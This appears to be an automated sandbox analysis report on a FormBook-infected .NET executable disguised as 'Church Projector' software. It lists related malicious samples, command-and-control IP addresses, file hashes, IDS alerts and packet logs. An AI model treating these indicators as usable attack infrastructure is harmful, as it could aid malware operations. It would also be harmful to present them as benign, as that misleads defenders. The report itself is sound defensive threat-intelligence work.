                                                                              • 107.180.41.236
                                                                              SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                              • 50.62.168.157
                                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              HAWB AND INV.exeGet hashmaliciousBrowse
                                                                              • 107.180.57.119
                                                                              Inquiry 05042021.docGet hashmaliciousBrowse
                                                                              • 107.180.43.16
                                                                              don.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              O1E623TjjW.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              product specification.xlsxGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                                              • 184.168.131.241
                                                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                              • 192.186.217.35
                                                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                              • 107.180.44.132
                                                                              CNSERVERSUSdon.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              wMqdemYyHm.exeGet hashmaliciousBrowse
                                                                              • 45.205.61.240
                                                                              letterhead.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.61
                                                                              DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              pending orders0308 D2101002610 pdf.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.59
                                                                              JLqUPrxTza.exeGet hashmaliciousBrowse
                                                                              • 45.93.101.93
                                                                              Swift Copy#0002.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                              • 23.225.41.92
                                                                              Swift002.exeGet hashmaliciousBrowse
                                                                              • 23.225.197.29
                                                                              jEXf5uQ3DE.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Purchase Order.xlsxGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Statement Of account.exeGet hashmaliciousBrowse
                                                                              • 45.205.60.183
                                                                              dot.dotGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              NEW ORDER - BLL04658464.exeGet hashmaliciousBrowse
                                                                              • 154.198.253.11
                                                                              New Order.exeGet hashmaliciousBrowse
                                                                              • 23.225.41.18
                                                                              BL836477488575.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.61
                                                                              B of L - way bill return.exeGet hashmaliciousBrowse
                                                                              • 154.198.253.11
                                                                              SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                              • 154.198.196.146

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.log
                                                                              Process:C:\Users\user\Desktop\g1EhgmCqCD.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1314
                                                                              Entropy (8bit):5.350128552078965
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.6258646097638785
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              File name:g1EhgmCqCD.exe
                                                                              File size:665600
                                                                              MD5:5551346aa9f251895021b95a2a7cc390
                                                                              SHA1:acbcecf7599d3c33f6f2a36c0947cfc633d0a406
                                                                              SHA256:9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
                                                                              SHA512:35e43a0f2ef1dd2dfaf921d8af3a4f3ef0f4675479d496141358561c84a3b8c8b1a5bd9497fe6c26757d3e6637edab538ac587d73bc6d47e9b90b751abf55ba3
                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:00828e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4a3d26
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x60911B56 [Tue May 4 10:00:54 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:v4.0.30319
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa3cd40x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x414.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xa1d2c0xa1e00False0.798448057432data7.63788106715IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xa40000x4140x600False0.287760416667data2.40391345759IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_VERSION0xa40580x3b8COM executable for DOS

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              LegalCopyrightCopyright Felix Jeyareuben 2012
                                                                              Assembly Version2.0.0.0
                                                                              InternalNameOnSerializedAttribute.exe
                                                                              FileVersion2.0
                                                                              CompanyNamewww.churchsw.org
                                                                              LegalTrademarksChurch Software
                                                                              Comments
                                                                              ProductNameChurch Projector
                                                                              ProductVersion2.0
                                                                              FileDescriptionChurch Projector
                                                                              OriginalFilenameOnSerializedAttribute.exe

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              05/04/21-18:40:11.893380TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:11.893380TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:11.893380TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:37.667261TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.667261TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.667261TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.868899TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                              05/04/21-18:40:43.289161TCP1201ATTACK-RESPONSES 403 Forbidden804976534.102.136.180192.168.2.4
                                                                              05/04/21-18:41:11.497022TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 4, 2021 18:40:05.923744917 CEST4976080192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:06.123193026 CEST8049760184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:06.124036074 CEST4976080192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:06.124053001 CEST4976080192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:06.324815035 CEST8049760184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:06.357764959 CEST8049760184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:06.357783079 CEST8049760184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:06.358078003 CEST4976080192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:06.358093977 CEST4976080192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:06.557281017 CEST8049760184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:11.698854923 CEST4976180192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:11.893053055 CEST8049761184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:11.893363953 CEST4976180192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:11.893379927 CEST4976180192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:12.089917898 CEST8049761184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:12.124341011 CEST8049761184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:12.124362946 CEST8049761184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:12.124597073 CEST4976180192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:12.124614000 CEST4976180192.168.2.4184.168.131.241
                                                                              May 4, 2021 18:40:12.317548990 CEST8049761184.168.131.241192.168.2.4
                                                                              May 4, 2021 18:40:37.625993013 CEST4976380192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:37.666980982 CEST804976334.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:37.667131901 CEST4976380192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:37.667260885 CEST4976380192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:37.708126068 CEST804976334.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:37.868899107 CEST804976334.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:37.868921041 CEST804976334.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:37.869244099 CEST4976380192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:37.869275093 CEST4976380192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:37.910165071 CEST804976334.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:42.954565048 CEST4976580192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:42.995554924 CEST804976534.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:42.995910883 CEST4976580192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:42.996263027 CEST4976580192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:43.037198067 CEST804976534.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:43.289160967 CEST804976534.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:43.289185047 CEST804976534.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:43.289745092 CEST4976580192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:43.289786100 CEST4976580192.168.2.434.102.136.180
                                                                              May 4, 2021 18:40:43.330719948 CEST804976534.102.136.180192.168.2.4
                                                                              May 4, 2021 18:40:48.383549929 CEST4976680192.168.2.4198.54.117.216
                                                                              May 4, 2021 18:40:48.587084055 CEST8049766198.54.117.216192.168.2.4
                                                                              May 4, 2021 18:40:48.587832928 CEST4976680192.168.2.4198.54.117.216
                                                                              May 4, 2021 18:40:49.213042974 CEST4976680192.168.2.4198.54.117.216
                                                                              May 4, 2021 18:40:49.417438984 CEST8049766198.54.117.216192.168.2.4
                                                                              May 4, 2021 18:40:49.417567968 CEST8049766198.54.117.216192.168.2.4
                                                                              May 4, 2021 18:40:54.522350073 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:40:54.654962063 CEST8049767107.180.51.23192.168.2.4
                                                                              May 4, 2021 18:40:54.655168056 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:40:54.655491114 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:40:54.790168047 CEST8049767107.180.51.23192.168.2.4
                                                                              May 4, 2021 18:40:55.149972916 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:40:55.324285984 CEST8049767107.180.51.23192.168.2.4
                                                                              May 4, 2021 18:40:55.565521955 CEST8049767107.180.51.23192.168.2.4
                                                                              May 4, 2021 18:40:55.565546989 CEST8049767107.180.51.23192.168.2.4
                                                                              May 4, 2021 18:40:55.565664053 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:40:55.565695047 CEST4976780192.168.2.4107.180.51.23
                                                                              May 4, 2021 18:41:00.382936954 CEST4976880192.168.2.4172.247.179.61
                                                                              May 4, 2021 18:41:00.597582102 CEST8049768172.247.179.61192.168.2.4
                                                                              May 4, 2021 18:41:00.597819090 CEST4976880192.168.2.4172.247.179.61
                                                                              May 4, 2021 18:41:00.597980022 CEST4976880192.168.2.4172.247.179.61
                                                                              May 4, 2021 18:41:00.813927889 CEST8049768172.247.179.61192.168.2.4
                                                                              May 4, 2021 18:41:00.817074060 CEST8049768172.247.179.61192.168.2.4
                                                                              May 4, 2021 18:41:00.817281961 CEST4976880192.168.2.4172.247.179.61
                                                                              May 4, 2021 18:41:00.817332029 CEST4976880192.168.2.4172.247.179.61
                                                                              May 4, 2021 18:41:01.031989098 CEST8049768172.247.179.61192.168.2.4
                                                                              May 4, 2021 18:41:11.251394987 CEST4977080192.168.2.434.102.136.180
                                                                              May 4, 2021 18:41:11.292433977 CEST804977034.102.136.180192.168.2.4
                                                                              May 4, 2021 18:41:11.294339895 CEST4977080192.168.2.434.102.136.180
                                                                              May 4, 2021 18:41:11.294384956 CEST4977080192.168.2.434.102.136.180
                                                                              May 4, 2021 18:41:11.335407019 CEST804977034.102.136.180192.168.2.4
                                                                              May 4, 2021 18:41:11.497021914 CEST804977034.102.136.180192.168.2.4
                                                                              May 4, 2021 18:41:11.497056007 CEST804977034.102.136.180192.168.2.4
                                                                              May 4, 2021 18:41:11.497194052 CEST4977080192.168.2.434.102.136.180
                                                                              May 4, 2021 18:41:11.497219086 CEST4977080192.168.2.434.102.136.180
                                                                              May 4, 2021 18:41:11.538275957 CEST804977034.102.136.180192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 4, 2021 18:38:54.024626017 CEST53652988.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:54.025485992 CEST53652988.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:54.268990993 CEST5912353192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:54.330634117 CEST53591238.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:55.011109114 CEST5453153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:55.074928045 CEST53545318.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:55.537355900 CEST4971453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:55.585961103 CEST53497148.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:56.369191885 CEST5802853192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:56.417763948 CEST53580288.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:57.321439981 CEST5309753192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:57.370109081 CEST53530978.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:58.314707994 CEST4925753192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:58.363447905 CEST53492578.8.8.8192.168.2.4
                                                                              May 4, 2021 18:38:59.156027079 CEST6238953192.168.2.48.8.8.8
                                                                              May 4, 2021 18:38:59.213253975 CEST53623898.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:00.725415945 CEST4991053192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:00.777441025 CEST53499108.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:01.888232946 CEST5585453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:01.940443993 CEST53558548.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:02.905877113 CEST6454953192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:02.954597950 CEST53645498.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:03.954514980 CEST6315353192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:04.004987001 CEST53631538.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:04.944576025 CEST5299153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:04.996160030 CEST53529918.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:05.830091000 CEST5370053192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:05.879779100 CEST53537008.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:06.929821968 CEST5172653192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:06.981394053 CEST53517268.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:07.703725100 CEST5679453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:07.752402067 CEST53567948.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:08.508982897 CEST5653453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:08.557581902 CEST53565348.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:10.943303108 CEST5662753192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:10.994750977 CEST53566278.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:11.739748001 CEST5662153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:11.788924932 CEST53566218.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:12.730926037 CEST6311653192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:12.779702902 CEST53631168.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:13.722815990 CEST6407853192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:13.771832943 CEST53640788.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:15.879122972 CEST6480153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:15.928826094 CEST53648018.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:24.070565939 CEST6172153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:24.121550083 CEST53617218.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:45.333444118 CEST5125553192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:45.443583012 CEST53512558.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:46.129746914 CEST6152253192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:46.243702888 CEST53615228.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:46.968714952 CEST5233753192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:47.028048992 CEST53523378.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:47.536840916 CEST5504653192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:47.593750000 CEST53550468.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:48.269646883 CEST4961253192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:48.327791929 CEST53496128.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:49.094772100 CEST4928553192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:49.154519081 CEST53492858.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:49.239351034 CEST5060153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:49.282809019 CEST6087553192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:49.290956020 CEST53506018.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:49.349447012 CEST53608758.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:49.796359062 CEST5644853192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:49.911396027 CEST53564488.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:50.620918989 CEST5917253192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:50.677948952 CEST53591728.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:51.735912085 CEST6242053192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:51.787457943 CEST53624208.8.8.8192.168.2.4
                                                                              May 4, 2021 18:39:52.639520884 CEST6057953192.168.2.48.8.8.8
                                                                              May 4, 2021 18:39:52.689064980 CEST53605798.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:04.444891930 CEST5018353192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:04.504713058 CEST53501838.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:05.845329046 CEST6153153192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:05.918068886 CEST53615318.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:11.368455887 CEST4922853192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:11.437558889 CEST53492288.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:17.135504961 CEST5979453192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:17.205519915 CEST53597948.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:22.243833065 CEST5591653192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:22.302524090 CEST53559168.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:27.308279037 CEST5275253192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:27.432954073 CEST53527528.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:32.453119040 CEST6054253192.168.2.48.8.8.8
                                                                              May 4, 2021 18:40:32.517307043 CEST53605428.8.8.8192.168.2.4
                                                                              May 4, 2021 18:40:35.333406925 CEST6068953192.168.2.48.8.8.8
